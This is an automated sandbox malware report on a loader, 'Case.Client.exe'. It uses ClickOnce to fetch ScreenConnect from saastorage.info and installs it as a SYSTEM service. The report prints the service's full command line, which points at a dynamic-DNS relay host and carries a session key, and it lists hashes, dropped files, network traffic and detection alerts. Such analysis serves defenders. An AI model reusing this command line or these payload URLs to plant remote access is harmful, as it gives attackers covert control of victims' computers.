File name: Case.Client.exe

Full analysis: https://app.any.run/tasks/07fe96e1-5870-40d2-ad9c-d1a5a86e5d27
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 29, 2025, 12:35:07
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
screenconnect
rmm-tool
remote
rat
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5: 816FFCFD0E41213B5CDEA0045F7477C4
SHA1: 05A10E49CB6B629577FA6A0DE02A01C3C6148E8B
SHA256: 972EA0E81E658CB0DAB8D8F4AB561AC2C064C3B7AC0DF0AC6A23BB157C5817C9
SSDEEP: 3072:UjLHcVw8licpWQog5Ms+f+l6xPVfq84a1A:UfoocptD5QPVfqQA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 4188)
    • Connects to the CnC server

      • ScreenConnect.ClientService.exe (PID: 4188)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.WindowsClient.exe (PID: 736)
    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 6744)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 6744)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 6744)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 4188)
    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 4188)
    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 4188)
    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 4188)
    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 4188)
    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 4188)
    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)
    • Detects ScreenConnect RAT (YARA)

      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)
  • INFO

    • Checks supported languages

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.WindowsClient.exe (PID: 736)
    • Reads the machine GUID from the registry

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)
    • Reads Environment values

      • dfsvc.exe (PID: 6744)
    • Reads the computer name

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)
    • Disables trace logs

      • dfsvc.exe (PID: 6744)
    • Checks proxy server information

      • dfsvc.exe (PID: 6744)
      • slui.exe (PID: 5048)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 6744)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4188)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 6744)
    • Reads the software policy settings

      • dfsvc.exe (PID: 6744)
      • slui.exe (PID: 5048)
    • Process checks computer location settings

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
    • SCREENCONNECT has been detected

      • ScreenConnect.ClientService.exe (PID: 4188)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 130
Monitored processes: 8
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Nodes in graph order: start, case.client.exe (no specs), dfsvc.exe, screenconnect.windowsclient.exe (no specs), screenconnect.clientservice.exe (#SCREENCONNECT), screenconnect.clientservice.exe (#SCREENCONNECT), screenconnect.windowsclient.exe (no specs), svchost.exe, slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 736
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe" "RunRole" "1f7fe0c1-f6a9-4120-a2fe-279dc7fa974c" "User"
Path: C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe
Parent process: ScreenConnect.ClientService.exe
User: admin
Company: ScreenConnect Software
Integrity Level: MEDIUM
Description: ScreenConnect Client
Version: 23.9.10.8817
Modules (images):
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 1056
CMD: "C:\Users\admin\Desktop\Case.Client.exe"
Path: C:\Users\admin\Desktop\Case.Client.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 1
Modules (images):
c:\users\admin\desktop\case.client.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 4068
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=myhostwin64.zapto.org&p=8041&s=2f26a95a-be34-48d8-9552-64bd48a40ecd&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&r=&i=Untitled%20Session" "5"
Path: C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe
Parent process: ScreenConnect.WindowsClient.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Version: 23.9.10.8817
Modules (images):
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
PID: 4188
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=myhostwin64.zapto.org&p=8041&s=2f26a95a-be34-48d8-9552-64bd48a40ecd&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&r=&i=Untitled%20Session" "5"
Path: C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe
Parent process: services.exe
User: SYSTEM
Integrity Level: SYSTEM
Version: 23.9.10.8817
Modules (images):
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
PID: 5048
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 5988
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe"
Path: C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe
Parent process: dfsvc.exe
User: admin
Company: ScreenConnect Software
Integrity Level: MEDIUM
Description: ScreenConnect Client
Exit code: 0
Version: 23.9.10.8817
Modules (images):
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 6744
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Parent process: Case.Client.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: ClickOnce
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events: 11 854
Read events: 11 654
Write events: 168
Delete events: 32

Modification events

(PID) Process: (1056) Case.Client.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:

(PID) Process: (1056) Case.Client.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation: write
Name: Blob
Value: (blob data not shown)

(PID) Process: (1056) Case.Client.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:

(PID) Process: (1056) Case.Client.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation: write
Name: Blob
Value: (blob data not shown)

(PID) Process: (6744) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: Q5LOPE31V7W2LQYM4PEZ8TGG

(PID) Process: (6744) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete value
Name: ComponentStore_RandomString
Value: Q5LOPE31V7W2LQYM4PEZ8TGG

(PID) Process: (6744) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete key
Name: (default)
Value:

(PID) Process: (6744) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: GM0QC387GCZLH3GWD82VN1ZM

(PID) Process: (6744) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation: write
Name: StateStore_RandomString
Value: QHY1N6R849OKWW9Z1JPBVO09

(PID) Process: (6744) dfsvc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0
Executable files: 16
Suspicious files: 18
Text files: 25
Unknown types: 0

Dropped files

PID | Process | Filename | Type

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe | executable
MD5: 5DEC65C4047DE914C78816B8663E3602
SHA256: 71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsBackstageShell.exe.config | xml
MD5: 728175E20FFBCEB46760BB5E1112F38B
SHA256: 87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe.manifest | xml
MD5: F4B84E283123B025A90BBDE33E2080FD
SHA256: 93F9EB492B6952D8C7AA1EF1EE5A901234BA1FD2D5EF58D24E1FAEF597EA8E02

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.ClientService.dll | executable
MD5: 22AF3A23BD30484514CDACF67C5B3810
SHA256: 7C5442121DBA2A30AB9579EC08E111DED372CF9CF90FB3256F273980B975AFA9

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe.config | xml
MD5: 728175E20FFBCEB46760BB5E1112F38B
SHA256: 87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe.genman | xml
MD5: EFA59A7F55AF829C3974A02F30EBE80C
SHA256: 3E2D5CC7867AFA23663D5894127CE6E2880D3075773A249B37576EDA5088875A

6744 | dfsvc.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792 | binary
MD5: D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256: 8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe:Zone.Identifier | text
MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.Windows.dll | executable
MD5: 29454A0CB83F28C24805E9A70E53444A
SHA256: 998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14

6744 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsFileManager.exe | executable
MD5: C333D3A6EEB74E4D76C3B9E0F6BFD04C
SHA256: 998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 39
TCP/UDP connections: 44
DNS requests: 16
Threats: 11

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation

6744 | dfsvc.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D | unknown | - | - | whitelisted
6744 | dfsvc.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D | unknown | - | - | whitelisted
- | - | GET | 200 | 173.211.46.170:443 | https://saastorage.info/Bin/ScreenConnect.WindowsFileManager.exe | unknown | - | - | -
- | - | GET | 200 | 173.211.46.170:443 | https://saastorage.info/Bin/ScreenConnect.WindowsFileManager.exe.config | unknown | - | - | -
- | - | GET | 200 | 173.211.46.170:443 | https://saastorage.info/Bin/ScreenConnect.WindowsBackstageShell.exe.config | unknown | - | - | -
6744 | dfsvc.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | - | - | whitelisted
- | - | GET | 200 | 173.211.46.170:443 | https://saastorage.info/Bin/ScreenConnect.WindowsClient.exe.config | unknown | - | - | -
5112 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | - | - | whitelisted
- | - | GET | 304 | 4.175.87.197:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | - | - | -
5112 | SIHClient.exe | GET | 200 | 23.48.23.140:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation

- | - | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
2104 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6744 | dfsvc.exe | 173.211.46.170:443 | saastorage.info | ATT-INTERNET4 | US | suspicious
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6744 | dfsvc.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
5112 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5112 | SIHClient.exe | 23.48.23.140:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5112 | SIHClient.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.174
whitelisted
saastorage.info
  • 173.211.46.170
malicious
client.wns.windows.com
  • 172.211.123.249
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
crl.microsoft.com
  • 23.48.23.140
  • 23.48.23.156
  • 23.48.23.161
  • 23.48.23.147
  • 23.48.23.145
  • 23.48.23.153
  • 23.48.23.193
  • 23.48.23.141
  • 23.48.23.191
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
myhostwin64.zapto.org
  • 173.211.46.170
unknown

Threats

PID | Process | Class | Message

- | - | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | Misc activity | ET INFO Packed Executable Download
- | - | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
- | - | A Network Trojan was detected | ET MALWARE Possible Windows executable sent when remote host claims to send html content
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DNS Query to DynDNS Domain *.zapto .org
4188 | ScreenConnect.ClientService.exe | Misc activity | ET REMOTE_ACCESS ScreenConnect/ConnectWise Initial Checkin Packet M2
No debug info